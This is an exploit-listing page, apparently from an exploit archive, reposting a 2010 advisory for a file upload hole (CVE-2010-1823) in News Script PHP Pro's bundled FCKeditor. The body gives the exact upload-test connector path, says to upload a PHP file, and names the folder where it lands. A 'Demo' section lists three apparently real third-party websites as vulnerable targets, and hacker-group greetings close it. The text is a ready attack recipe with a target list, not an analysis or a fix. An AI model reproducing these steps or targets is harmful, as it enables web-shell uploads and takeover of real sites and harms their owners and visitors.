Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
CVE-2010-1823 | CWE-434 | Not specified | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
mobin | High | Remote | 2011-01-02 |
============================================================================== [] News Script PHP Pro (fckeditor) File Upload Vulnerability ============================================================================== [] Title : [ News Script PHP Pro (fckeditor) File Upload Vulnerability ] [] Script : [ News Script PHP Pro ] [] Platform: [ linux/php ] [] Download: [ http://newsscriptphp.com/ ] [] Author : [ Net.Edit0r } [] Email : [ [email protected] ] [] Date : [ 2010-12-26 ] [] Version : [ Full Version ] ########################################################################### ===[ Exploit ]=== ./Iranian HackerZ [»] http://server/[patch]/fckeditor/editor/filemanager/connectors/uploadtest.html [»] Select the "File Upload" To use = php ===[ Upload To ]=== [»] http://server/[patch]/userfiles/Name File ===[ Demo ]=== [»] http://www.footydraft.com/news/fckeditor/editor/filemanager/connectors/uploadtest.html [»] http://www.htarcade.com/news_script/fckeditor/editor/filemanager/connectors/uploadtest.html [»] http://funeralscriptphp.com/funeralscript/fckeditor/editor/filemanager/connectors/uploadtest.html Greetz : HUrr!c4nE , H-SK33PY , Cair3x , B3hz4d , M4hd1 , Ali.Erroor BHG : Net.Edit0r ~ Darkcoder ~ keracker ###########################################################################
Copyright ©2024 Exploitalert.